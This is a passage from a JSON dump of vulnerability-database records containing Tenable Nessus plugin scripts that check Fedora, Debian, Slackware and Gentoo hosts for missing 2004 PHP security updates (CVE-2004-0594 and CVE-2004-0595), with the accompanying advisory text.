);\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the 'register_globals' setting has been enabled.\nCVE-2004-0595 can allow a possible cross-site-scripting attack with\nsome browsers.\n\nThe mbstring extension has been moved into the php-mbstring subpackage\nin this update to reduce the overall package size.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-July/000228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0288a8dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"php-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-debuginfo-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-devel-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-domxml-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-imap-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-ldap-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-mbstring-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-mysql-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-odbc-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-pgsql-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", 
reference:\"php-snmp-4.3.8-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"php-xmlrpc-4.3.8-1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-debuginfo / php-devel / php-domxml / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:55", "bulletinFamily": "scanner", "description": "This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the ", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2004-223.NASL", "href": "https://www.tenable.com/plugins/nessus/13749", "published": "2004-07-24T00:00:00", "title": "Fedora Core 2 : php-4.3.8-2.1 (2004-223)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-223.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13749);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2019/08/02 13:32:23\");\n\n script_xref(name:\"FEDORA\", value:\"2004-223\");\n\n script_name(english:\"Fedora Core 2 : php-4.3.8-2.1 (2004-223)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest release of PHP 4, including fixes for\nsecurity issues in memory 
limit handling (CVE-2004-0594), and the\nstrip_tags function (CVE-2004-0595). CVE-2004-0595 is not known to be\nexploitable in the default configuration if using httpd 2.0.50, but\ncan be triggered if the 'register_globals' setting has been enabled.\nCVE-2004-0595 can allow a possible cross-site-scripting attack with\nsome browsers.\n\nThe mbstring extension has been moved into the php-mbstring subpackage\nin this update to reduce the overall package size.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-July/000229.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfe80132\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"php-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-debuginfo-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-devel-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-domxml-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-imap-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-ldap-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-mbstring-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-mysql-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-odbc-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-pear-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-pgsql-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-snmp-4.3.8-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"php-xmlrpc-4.3.8-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-debuginfo / php-devel / php-domxml / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:00:58", "bulletinFamily": "scanner", "description": "Two vulnerabilities were discovered in php4 :\n\n - CAN-2004-0594\n The memory_limit functionality in PHP 4.x up to 
4.3.7,\n and 5.x up to 5.0.0RC3, under certain conditions such as\n when register_globals is enabled, allows remote\n attackers to execute arbitrary code by triggering a\n memory_limit abort during execution of the\n zend_hash_init function and overwriting a HashTable\n destructor pointer before the initialization of key data\n structures is complete.\n\n - CAN-2004-0595\n\n The strip_tags function in PHP 4.x up to 4.3.7, and 5.x\n up to 5.0.0RC3, does not filter null (\\0) characters\n within tag names when restricting input to allowed tags,\n which allows dangerous tags to be processed by web\n browsers such as Internet Explorer and Safari, which\n ignore null characters and facilitate the exploitation\n of cross-site scripting (XSS) vulnerabilities.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-531.NASL", "href": "https://www.tenable.com/plugins/nessus/15368", "published": "2004-09-29T00:00:00", "title": "Debian DSA-531-1 : php4 - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-531. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15368);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/08/02 13:32:18\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"DSA\", value:\"531\");\n\n script_name(english:\"Debian DSA-531-1 : php4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities were discovered in php4 :\n\n - CAN-2004-0594\n The memory_limit functionality in PHP 4.x up to 4.3.7,\n and 5.x up to 5.0.0RC3, under certain conditions such as\n when register_globals is enabled, allows remote\n attackers to execute arbitrary code by triggering a\n memory_limit abort during execution of the\n zend_hash_init function and overwriting a HashTable\n destructor pointer before the initialization of key data\n structures is complete.\n\n - CAN-2004-0595\n\n The strip_tags function in PHP 4.x up to 4.3.7, and 5.x\n up to 5.0.0RC3, does not filter null (\\0) characters\n within tag names when restricting input to allowed tags,\n which allows dangerous tags to be processed by web\n browsers such as Internet Explorer and Safari, which\n ignore null characters and facilitate the exploitation\n of cross-site scripting (XSS) vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-531\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the current stable distribution (woody), these problems have been\nfixed in version 4.1.2-7.\n\nWe recommend that you update your php4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"caudium-php4\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-cgi\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-curl\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-dev\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", 
prefix:\"php4-domxml\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-gd\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-imap\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-ldap\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-mcal\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-mhash\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-mysql\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-odbc\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-pear\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-recode\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-snmp\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-sybase\", reference:\"4.1.2-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php4-xslt\", reference:\"4.1.2-7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:33:50", "bulletinFamily": "scanner", "description": "New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and\n-current to fix security issues (memory_limit handling and a problem\nin the strip_tags function). 
Sites using PHP should upgrade.", "modified": "2019-12-02T00:00:00", "id": "SLACKWARE_SSA_2004-202-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18773", "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : PHP (SSA:2004-202-01)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-202-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18773);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/10/25 13:36:20\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"SSA\", value:\"2004-202-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : PHP (SSA:2004-202-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and\n-current to fix security issues (memory_limit handling and a problem\nin the strip_tags function). 
Sites using PHP should upgrade.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?011c10ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 
\"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"4.3.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:33:14", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200407-13\n(PHP: Multiple security vulnerabilities)\n\n Several security vulnerabilities were found and fixed in version 4.3.8 of\n PHP. The strip_tags() function, used to sanitize user input, could in\n certain cases allow tags containing \\\\0 characters (CAN-2004-0595). When\n memory_limit is used, PHP might unsafely interrupt other functions\n (CAN-2004-0594). 
The ftok and itpc functions were missing safe_mode checks.\n It was possible to bypass open_basedir restrictions using MySQL", "modified": "2019-12-02T00:00:00", "id": "GENTOO_GLSA-200407-13.NASL", "href": "https://www.tenable.com/plugins/nessus/14546", "published": "2004-08-30T00:00:00", "title": "GLSA-200407-13 : PHP: Multiple security vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200407-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14546);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/08/02 13:32:41\");\n\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_xref(name:\"GLSA\", value:\"200407-13\");\n\n script_name(english:\"GLSA-200407-13 : PHP: Multiple security vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200407-13\n(PHP: Multiple security vulnerabilities)\n\n Several security vulnerabilities were found and fixed in version 4.3.8 of\n PHP. The strip_tags() function, used to sanitize user input, could in\n certain cases allow tags containing \\\\0 characters (CAN-2004-0595). When\n memory_limit is used, PHP might unsafely interrupt other functions\n (CAN-2004-0594). 
The ftok and itpc functions were missing safe_mode checks.\n It was possible to bypass open_basedir restrictions using MySQL's LOAD DATA\n LOCAL function. Furthermore, the IMAP extension was incorrectly allocating\n memory and alloca() calls were replaced with emalloc() for better stack\n protection.\n \nImpact :\n\n Successfully exploited, the memory_limit problem could allow remote\n execution of arbitrary code. By exploiting the strip_tags vulnerability, it\n is possible to pass HTML code that would be considered as valid tags by the\n Microsoft Internet Explorer and Safari browsers. Using ftok, itpc or\n MySQL's LOAD DATA LOCAL, it is possible to bypass PHP configuration\n restrictions.\n \nWorkaround :\n\n There is no known workaround that would solve all these problems. All users\n are encouraged to upgrade to the latest available versions.\"\n );\n # http://security.e-matters.de/advisories/112004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?83c215d0\"\n );\n # http://security.e-matters.de/advisories/122004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d4bce03\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200407-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP, mod_php and php-cgi users should upgrade to the latest stable\n version:\n # emerge sync\n # emerge -pv '>=dev-php/php-4.3.8'\n # emerge '>=dev-php/php-4.3.8'\n # emerge -pv '>=dev-php/mod_php-4.3.8'\n # emerge '>=dev-php/mod_php-4.3.8'\n # emerge -pv '>=dev-php/php-cgi-4.3.8'\n # emerge '>=dev-php/php-cgi-4.3.8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 